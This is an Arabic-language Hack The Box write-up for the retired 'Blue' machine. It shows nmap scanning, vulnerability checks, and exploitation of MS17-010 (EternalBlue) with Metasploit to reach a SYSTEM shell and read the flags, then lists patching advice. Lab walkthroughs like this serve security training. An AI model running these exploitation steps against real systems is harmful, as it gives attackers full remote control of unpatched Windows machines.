حافظ على الهدوء وهاك الصندوق - أزرق

Hack The Box (HTB) عبارة عن منصة عبر الإنترنت تتيح لك اختبار مهارات اختبار الاختراق لديك.

يحتوي على العديد من التحديات التي يتم تحديثها باستمرار. البعض منهم يحاكي سيناريوهات العالم الحقيقي والبعض الآخر يميل أكثر نحو أسلوب التحدي CTF.

ملاحظة : يُسمح فقط بعمليات الكتابة لأجهزة HTB المتوقفة عن العمل.

Blue هي واحدة من أبسط الأجهزة في Hack The Box. لكنه يوضح تأثير استغلال EternalBlue ، والذي تم استخدامه لخرق الشركات من خلال هجمات الفدية واسعة النطاق وهجمات التعدين المشفر.

سنستخدم الأدوات التالية لرهن الصندوق على صندوق Kali Linux:

  • nmap
  • searchsploit
  • ميتاسبلويت
  • المتر

هيا بنا نبدأ.

أولاً ، أقوم بإضافة Blue في ملف / etc / hosts.

nano /etc/hosts

مع

10.10.10.40 blue.htb

الخطوة 1 - الاستطلاع

تتمثل الخطوة الأولى قبل استغلال الجهاز في إجراء القليل من المسح والاستطلاع.

هذا أحد أهم الأجزاء لأنه سيحدد ما يمكنك محاولة استغلاله بعد ذلك. من الأفضل دائمًا قضاء المزيد من الوقت في هذه المرحلة للحصول على أكبر قدر ممكن من المعلومات.

مسح المنفذ

وسوف تستخدم NMAP (شبكة مخطط). Nmap هو أداة مساعدة مجانية ومفتوحة المصدر لاكتشاف الشبكة والتدقيق الأمني.

يستخدم حزم IP الأولية لتحديد المضيفين المتاحين على الشبكة ، والخدمات التي يقدمها هؤلاء المضيفون ، وأنظمة التشغيل التي يتم تشغيلها ، ونوع عوامل تصفية الحزمة / جدران الحماية المستخدمة ، وعشرات الخصائص الأخرى.

هناك العديد من الأوامر التي يمكنك استخدامها مع هذه الأداة لفحص الشبكة. إذا كنت ترغب في معرفة المزيد عنها ، يمكنك إلقاء نظرة على الوثائق هنا.

أستخدم الأمر التالي لإجراء فحص مكثف:

nmap -A -v blue.htb

-A: تمكين اكتشاف نظام التشغيل واكتشاف الإصدار ومسح البرنامج النصي وتتبع المسار

-v: يزيد من مستوى الإسهاب

htb الأزرق : اسم مضيف المربع الأزرق

إذا وجدت النتائج مربكة بعض الشيء ، يمكنك تجربة هذا:

nmap blue.htb

يمكننا أن نرى أن هناك عددًا غير قليل من المنافذ المفتوحة بما في ذلك:

المنفذ 445، مشاركة ملفات SMB لـ Microsoft-DS (خدمات الدليل)

من فحص nmap ، لدينا بعض المعلومات المتعلقة باسم الكمبيوتر (haris-PC) وإصدار SMB (2.02).

Server Message Block (SMB) هو بروتوكول شبكة يمكّن المستخدمين من الاتصال بأجهزة الكمبيوتر والخوادم البعيدة من أجل استخدام مواردهم أو مشاركة الملفات وفتحها وتحريرها.

من اسم هذا المربع وأنه جهاز يعمل بنظام Windows مع فتح المنفذ 445 ، يمكننا أن نفترض أن الجهاز عرضة لـ EternalBlue. أستخدم برنامجًا نصيًا nmap للتحقق من هذه المعلومات بما يلي:

nmap --script vuln -p 445 blue.htb

يمكننا أن نرى أن الصندوق عرضة لثغرة أمنية عن بُعد في تنفيذ التعليمات البرمجية في خوادم Microsoft SMBv1 (ms17-010).

الخطوة 2 - فهم ms17-010

ما هو MS17-010؟

EternalBlue هو استغلال للهجوم الإلكتروني طورته وكالة الأمن القومي الأمريكية (NSA). تم تسريبه من قبل مجموعة قراصنة Shadow Brokers في 14 أبريل 2017 ، بعد شهر واحد من قيام Microsoft بإصدار تصحيحات للثغرة الأمنية - ويكيبيديا

يمكنك قراءة المزيد هنا. تم تصحيح هذه الثغرة الأمنية وتم إدراجها في نشرة أمان Microsoft باسم MS17-010.

يسمح EternalBlue للمتسللين بتنفيذ تعليمات برمجية عشوائية عن بُعد للوصول إلى الشبكة. يستغل ثغرة أمنية في بروتوكول Windows OS SMB. يمكن أن يؤدي الاستغلال إلى اختراق الشبكة والأجهزة المتصلة بها بالكامل.

يمكن أن تنتشر البرامج الضارة التي تستخدم EternalBlue عبر الشبكات. في عام 2017 ، استخدم WannaCry - وهو برنامج تشفير فدية - استغلال EternalBlue الذي انتشر عبر الشبكة ليصيب جميع الأجهزة المتصلة.

الخطوة 3 - استغلال EternalBlue

أستخدم Searchsploit للتحقق مما إذا كان هناك أي استغلال معروف. Searchsploit هي أداة بحث سطر أوامر لقاعدة بيانات إكسبلويت.

أستخدم الأمر التالي:

searchsploit eternalblue

يمكنني الحصول على مزيد من التفاصيل حول استغلال مع:

searchsploit -x 41738.py

يمكنك أيضًا التحقق من قاعدة بيانات Exploit للعثور على الثغرة.

تتوفر وحدة Metasploit واحدة.

سنستخدم Metasploit ، وهو إطار عمل لاختبار الاختراق يجعل القرصنة بسيطة. إنها أداة أساسية للعديد من المهاجمين والمدافعين.

أقوم بتشغيل Metasploit Framework على Kali وأبحث عن الأمر الذي يجب أن أستخدمه للاستغلال.

لا تنس تحديث Metasploit عند تشغيله بهذا الأمر:

msfupdate

يمكنك أيضًا التحقق مما إذا كان الهدف عرضة لـ EternalBlue على Metasploit باستخدام أداة مساعدة. ابدأ بهذا الأمر:

search eternalblue

ثم في هذه الحالة

use 1

لتحديد

auxiliary/scanner/smb/smb_ms17_010

يمكنك التحقق من الخيارات باستخدام

show options

وتعيين RHOSTS مع

set RHOSTS blue.htb

ثم قم بتشغيل المساعد مع

run

يمكنك أن ترى أن المضيف من المحتمل أن يكون عرضة لـ MS17-010!

دعنا الآن نتحقق من الثغرة باستخدام

use 2

أو الأمر

exploit/windows/smb/ms17_010_eternalblue

نحتاج إلى إعداد خيارات RHOSTS

و LHOST - كان لي 10.10.14.24. ستحتاج إلى إعداده باستخدام LHOST الخاص بك. يمكنك التحقق من ملكيتك هنا.

قبل تشغيل الاستغلال ، يمكنك التحقق هنا مما إذا كان الجهاز ضعيفًا - سيؤدي ذلك إلى تشغيل الأداة المساعدة التي استخدمناها سابقًا مع الأمر

check

ثم أدير الاستغلال مع

run

كان لابد من تشغيل الثغرة عدة مرات قبل أن أحصل على جلسة Meterpreter .

إليك تعريف Meterpreter من Offensive Security:

Meterpreter عبارة عن حمولة متقدمة قابلة للتوسيع ديناميكيًا تستخدم أدوات حقن DLL في الذاكرة ويتم تمديدها عبر الشبكة في وقت التشغيل. يتصل عبر مقبس stager ويوفر واجهة برمجة تطبيقات Ruby شاملة من جانب العميل. يتميز بسجل الأوامر وإكمال علامات التبويب والقنوات والمزيد.

يمكنك قراءة المزيد عن Meterpreter هنا.

لنبدأ بجمع بعض المعلومات.

يقوم getuid بإرجاع معرف المستخدم الحقيقي لعملية الاتصال.

حساب NT Authority \ SYSTEM أو LocalSystem هو حساب Windows مضمن. إنه أقوى حساب على مثيل Windows المحلي. لدينا وصول المسؤول على هذا الجهاز.

الخطوة 4 - البحث عن علامة user.txt

انتقل إلى مجلد haris من المستندات والإعدادات .

يمكنني سرد ​​جميع الملفات / المجلدات باستخدام الأمر التالي:

ls -la

ثم أنتقل إلى سطح المكتب باستخدام

cd Desktop

وأجد علم المستخدم! يمكنني التحقق من محتويات الملف باستخدام

cat user.txt

الخطوة 5 - البحث عن علامة root.txt

لنجد علم الجذر الآن. انتقلت إلى المستخدمين وقمت بتسجيل الوصول إلى مجلد المسؤول / سطح المكتب . أجد العلم!

أستخدم الأمر التالي لمشاهدة محتوى الملف:

cat root.txt

مبروك! لقد وجدت كلا العلمين.

العلاجات

  • قم بتصحيح أجهزتك بالتحديث الأمني ​​لبرنامج Microsoft Windows SMB v1. يمكنك التحقق من نشرة أمان Microsoft لمعرفة أنظمة التشغيل المتأثرة
  • قم بتعطيل SMB v1 واستخدم SMB v2 أو v3
  • طبق مبدأ الامتياز الأقل على جميع أنظمتك وخدماتك

من فضلك لا تتردد في التعليق أو طرح الأسئلة أو المشاركة مع أصدقائك :)

يمكنك مشاهدة المزيد من المقالات من سلسلة Keep Calm and Hack the Box هنا.

يمكنك متابعتي على Twitter أو LinkedIn.

ولا تنسى # GetSecure و # BeSecure و # StaySecure !